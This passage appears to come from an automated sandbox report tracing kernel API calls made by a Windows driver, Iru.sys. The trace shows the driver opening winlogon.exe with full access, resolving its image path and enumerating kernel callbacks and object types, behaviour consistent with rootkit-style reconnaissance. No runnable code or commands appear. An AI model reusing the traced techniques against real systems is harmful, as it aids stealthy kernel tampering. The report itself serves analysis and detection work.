| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
Execution Path #107 (length: 16, count: 21, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 16 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 21 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x37d3 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Execution Path #136 (length: 10, count: 5, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 10 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 5 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x3f, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77e230 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
Kernel Graph 32
Code Block #40 (EP #101)
»
| Information | Value |
|---|---|
| Trigger | KiExecuteAllDpcs+0x26c |
| Start Address | 0xfffff800fc2b6db0 |
Execution Path #101 (length: 4, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 4 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1c8, SpinLock_unk_out = 0xfffff800fc55c1c8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1c8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1c8 |
| IoCompleteRequest | ret_val_out = 0xc0000016 |
| IoCompleteRequest | ret_val_out = 0xc0000016 |
Kernel Graph 33
Code Block #41 (EP #111)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2be358 |
| Start Address | 0xfffff8004185501c |
Execution Path #111 (length: 1, count: 4, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 2 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b902c530, ret_val_out = 1 |
Kernel Graph 34
Code Block #42 (EP #112)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b4858 |
| Start Address | 0xfffff80041b0ccd8 |
Execution Path #112 (length: 1, count: 6, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 3 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ObQueryNameString | Object_ptr = 0xffffc000b902c530, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
Kernel Graph 35
Code Block #43 (EP #113)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2c65a3 |
| Start Address | 0xfffff80041769710 |
Execution Path #113 (length: 1, count: 7, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 2 |
| Process 25 (winlogon.exe, PID: 508) | 2 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 3 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 |
Kernel Graph 36
Code Block #44 (EP #114)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2c672c |
| Start Address | 0xfffff800416d9770 |
Execution Path #114 (length: 1, count: 2, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 1 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS |
Kernel Graph 37
Code Block #45 (EP #116)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2c5797 |
| Start Address | 0xfffff800417b65c0 |
Execution Path #116 (length: 1, count: 2, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 1 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
Kernel Graph 38
Code Block #46 (EP #117)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2bd046 |
| Start Address | 0xfffff800417c2ca0 |
Execution Path #117 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd00043ff5040, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd00043ff5020, ClientId_deref_UniqueProcess_unk = 0x1fc, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd00043ff5000, ProcessHandle_out = 0x46c, ret_val_out = 0x0 |
Kernel Graph 39
Code Block #47 (EP #118)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2cf16d |
| Start Address | 0xfffff800417c2b00 |
Execution Path #118 (length: 1, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ZwQueryInformationProcess | ProcessHandle_unk = 0x46c, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd00043ff5098, ret_val_out = 0xc0000004 |
Kernel Graph 40
Code Block #48 (EP #119)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b2ec6 |
| Start Address | 0xfffff800417c2e40 |
Execution Path #119 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ZwOpenFile | DesiredAccess_unk = 0x80000000, ObjectAttributes_ptr = 0xffffd00043ff5040, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Device\HarddiskVolume1\Windows\System32\winlogon.exe, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ShareAccess = 0x3, OpenOptions = 0x0, FileHandle_ptr_out = 0xffffd00043ff5008, FileHandle_out = 0xffffffff80001064, IoStatusBlock_unk_out = 0xffffd00043ff5030, ret_val_out = 0x0 |
Kernel Graph 41
Code Block #49 (EP #120)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2cc547 |
| Start Address | 0xfffff80041a74b50 |
Execution Path #120 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80001064, DesiredAccess_unk = 0x10000000, ObjectType_unk = 0xffffe0003a468dc0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd00043ff50a8, Object_out = 0xffffe0003c6f9d00, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
Kernel Graph 42
Code Block #50 (EP #121)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2c97b2 |
| Start Address | 0xfffff80041ab0c78 |
Execution Path #121 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoVolumeDeviceToDosName | VolumeDeviceObject_ptr = 0xffffe0003b695780, DosName_out = C:, ret_val_out = 0x0 |
Kernel Graph 43
Code Block #51 (EP #122)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2c32f1 |
| Start Address | 0xfffff80041772b40 |
Execution Path #122 (length: 1, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| RtlAppendUnicodeStringToString | Destination = \??\, Source = C:, Destination_out = \??\C:, ret_val_out = 0x0 |
Kernel Graph 44
Code Block #52 (EP #123)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b3dbf |
| Start Address | 0xfffff800416d4700 |
Execution Path #123 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ObfDereferenceObject | Object_ptr = 0xffffe0003c6f9d00, ret_val_ptr_out = 0x8000 |
Kernel Graph 45
Code Block #53 (EP #124)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b9417 |
| Start Address | 0xfffff800417c29c0 |
Execution Path #124 (length: 1, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ZwClose | Handle_unk = 0xffffffff80001064, ret_val_out = 0x0 |
Kernel Graph 46
Code Block #54 (EP #125)
»
| Information | Value |
|---|---|
| Trigger | Iru.sys+0x2b55d6 |
| Start Address | 0xfffff80041aa5010 |
Execution Path #125 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| RtlFreeAnsiString | AnsiString = \ |
Kernel Graph 47
Code Block #55 (EP #191)
»
| Information | Value |
|---|---|
| Trigger | ExpWorkerThread+0xe7 |
| Start Address | 0xffffe0003c9c29f5 |
Execution Path #191 (length: 686, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 686 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f7ae64c0 |
| ExpEnumerateCallback | ret_val_out = 0xfffff80041b86ea4 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff80041b86ea4, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff80041684000, ret_val_ptr_out = 0xfffff80041684000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff80041627a20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff80041627a20, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff80041611000, ret_val_ptr_out = 0xfffff80041611000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f7ec36f0 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f7ec36f0, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f7ea0000, ret_val_ptr_out = 0xfffff800f7ea0000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f81bdc30 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f81bdc30, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8180000, ret_val_ptr_out = 0xfffff800f8180000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f921c760 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f921c760, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f9170000, ret_val_ptr_out = 0xfffff800f9170000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f806fd20 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f806fd20, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8040000, ret_val_ptr_out = 0xfffff800f8040000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f7eea420 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f7eea420, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f7ea0000, ret_val_ptr_out = 0xfffff800f7ea0000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f86f6a30 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f86f6a30, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f8630000, ret_val_ptr_out = 0xfffff800f8630000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f92836b0 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f92836b0, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f9170000, ret_val_ptr_out = 0xfffff800f9170000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff80041cb5748 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff80041cb5748, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff80041684000, ret_val_ptr_out = 0xfffff80041684000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800f9ee4230 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800f9ee4230, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800f9e50000, ret_val_ptr_out = 0xfffff800f9e50000 |
| ExpEnumerateCallback | ret_val_out = 0xfffff800faac8930 |
| RtlPcToFileHeader | PcValue_ptr = 0xfffff800faac8930, BaseOfImage_ptr_out = 0xffffd0002d206f38, BaseOfImage_out = 0xfffff800faac0000, ret_val_ptr_out = 0xfffff800faac0000 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ExpEnumerateCallback | ret_val_out = 0x0 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Type, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a451df0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a451df0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Directory, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a4556a0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a4556a0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\SymbolicLink, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a43e080, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a43e080, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Token, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a45fa10, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a45fa10, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Job, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a45ff20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a45ff20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Process, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a460080, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a460080, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Thread, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a458e90, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a458e90, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\UserApcReserve, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a43f470, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a43f470, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\IoCompletionReserve, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a45f320, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a45f320, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\DebugObject, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a459ab0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a459ab0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Event, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a46ceb0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a46ceb0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Mutant, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a44ee40, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a44ee40, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Callback, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a45dca0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a45dca0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Semaphore, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a46aeb0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a46aeb0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Timer, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a44d300, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a44d300, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\IRTimer, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a485f20, ret_val_out = 0x0 |
